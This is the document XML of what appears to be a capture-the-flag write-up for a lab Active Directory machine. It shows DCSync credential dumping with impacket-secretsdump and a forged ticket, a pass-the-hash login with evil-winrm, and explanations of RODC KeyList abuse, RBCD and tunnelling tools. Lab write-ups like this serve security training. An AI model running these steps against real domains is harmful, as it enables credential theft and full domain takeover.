      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8. DCSync and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60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Convert kirbi to ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -c "from impacket.krb5.ccache import CCache; cc=CCache.loadKirbiFile('/tmp/admin_tgt.kirbi'); cc.saveFile('/tmp/admin_tgt.ccache')"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DCSync with Administrator ticket</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">KRB5CCNAME=/tmp/admin_tgt.ccache faketime '...' impacket-secretsdump -k -no-pass garfield.htb/Administrator@DC01.garfield.htb -dc-ip 10.129.16.120 -just-dc-ntlm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Pass-the-Hash → Administrator shell on DC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 10.129.16.120 -u Administrator -H EE238F6DEBC752010428F20875B092D5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">type C:\Users\Administrator\Desktop\root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RODC and krbtgt_XXXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each Read-Only Domain Controller has its own krbtgt account (e.g., krbtgt_8245) with an independent AES256 key. The rodcNumber in the ticket's kvno field identifies which RODC key was used to sign the TGT. DC01 uses this to route KeyList requests to the correct RODC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">KeyList Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The KeyList attack (KERB-KEY-LIST-REQ) allows a legitimate RODC to request the credentials of users in its replication allowlist from the main DC. By forging a RODC Golden Ticket, the same mechanism can be exploited offensively: DC01 sees a valid RODC ticket and responds with the real credentials of the requested account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RBCD vs Kerberos Delegation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource-Based Constrained Delegation allows a target computer to specify which accounts can impersonate users against it. Unlike traditional constrained delegation, RBCD can be configured without Domain Admin rights — only GenericWrite on the target computer object is needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-ng vs Chisel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-ng operates at the network interface level, creating a TUN interface that routes all traffic transparently. Unlike Chisel (SOCKS proxy), Ligolo-ng doesn't require proxy configuration in each tool — tools connect directly as if they were on the same network.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2026-05-05T17:58:32.461Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-05T17:58:32.461Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>